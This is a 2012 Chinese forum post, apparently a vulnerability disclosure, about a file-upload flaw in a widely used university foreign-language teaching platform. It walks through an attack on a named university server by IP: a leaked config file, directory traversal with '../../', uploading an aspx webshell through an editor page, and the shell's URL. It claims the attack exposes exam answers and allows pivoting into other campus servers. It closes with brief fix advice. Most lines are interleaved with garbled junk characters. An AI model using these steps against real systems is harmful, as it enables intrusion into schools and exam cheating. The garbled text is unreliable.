找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2266|回复: 0
打印 上一主题 下一主题

新理念外语网络教学平台文件上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-4 11:10:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
好多大学都在用这个教学平台,这个漏洞会导致直接拿到试题答案,甚至作为跳板继续渗透进入学校其他服务器中
3 |; R! l; z0 g- x
. k3 c$ Q. b$ S4 L4 D% \详细说明:; U- b" U9 j  n) F" P

7 O7 a- ^: c4 Z8 p$ @" S: o; O2 M( g* E以南开大学的为例: ) J: C+ ?* j+ I7 j6 ], i2 P
http://222.30.60.3/NPELS" b/ l* Z( m( I1 ^; o/ v. \
NPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址9 g# `! d; p& ?5 Z7 t: |
<setting name="Update_CommonSvr_CommonService" serializeAs="String">
" ~* M- R* Q2 W- i' E6 M<value>http://222.30.60.3/NPELS/CommonService.asmx</value>- m0 m, U" L! q7 ^. X, _) z1 ?8 W
</setting>1 w4 w4 r( w5 @* r3 l3 C1 U( o( V
及版本号  u+ G9 Z+ c4 u: i. M( B
<add key="TVersion" value="1, 0, 0, 2187">" F, \$ X- R8 Z5 u1 M+ q
</add>) N4 W" `3 c: @, z' Q
直接访问
4 F1 k& N. J1 k  rhttp://222.30.60.3/NPELS/CommonService.asmx
$ r# N) P5 S6 q$ Q3 C& @% c; {使用GetTestClientFileList操作,直接 HTTP GET 列目录:
4 u' h* U3 \& _$ L, Y, s8 G3 M' [. yhttp://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187
8 l+ R9 J7 k0 h进一步列目录(返回的网页很大,可以直接 wget 下来)
" q5 l; M8 @, S& S) M; Qhttp://222.30.60.3/NPELS/CommonS ... List?version=../../
4 S6 |) j% i, p  M8 x* r 8 e* }7 ~$ U6 N3 x7 j4 v. Y
发现
4 m* |2 L5 ~. m5 F: {# Ghttp://zzxx.nankai.edu.cn/npelsv/editor/editor.htm9 U- _+ a; v& R* `
可以上传,直接上传aspx木马即可,不需要改后缀名或者文件头
! w! x; O/ X7 j上传后继续列目录找到木马地址直接访问即可
& [$ Z6 W2 H4 T  f
8 ]) W1 O" b) G! C( c8 R  vOOXX2 L; W0 m  D6 |0 v9 `3 _+ k
% @3 S2 q! l& i/ N8 ?( k) d- e
Google "新理念外语网络教学平台" 测试了几个其他的站,都有类似的列目录上传方法0 o1 N% k% j1 B2 Q9 n( w3 M
漏洞证明:
- x5 k$ E8 l# Q% {* K9 ^# _
% T) [9 e& d) i- Z列目录:
0 e: C8 K% M7 k: ~1 s9 C* phttp://222.30.60.3/NPELS/CommonS ... List?version=../../
% }' ?) |4 r& U1 g/ @8 W9 ~文件上传:
; O( s% C- ^, R9 y7 Yhttp://222.30.60.3/npelsv/editor/editor.htm  Z, j$ e% q) ^8 w- [  K+ h- H
$ f9 J3 z  ^4 c- v7 R+ t- ?5 {
上传木马:3 b7 n6 N  ]1 a" I7 `% i
http://222.30.60.3/npelsv/editor/uploadfiles/1.aspx# V  P8 H! X0 p  r$ b
7 n8 j7 D# w' c$ x& w$ a
修复方案:: E, ^; j. x' R7 M
好像考试系统必须使用 CommonService.asmx" X) o  _! I; X1 l- V2 x
最好配置文件加密或者用别的方式不让它泄露出来7 |3 H$ x* m* Y& ^2 o7 a+ J6 v
并且检查或删除各上传入口,像 http://222.30.60.3/NPELS/Upload.aspx 一样​
" z5 N& ~; L) i! M/ E
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表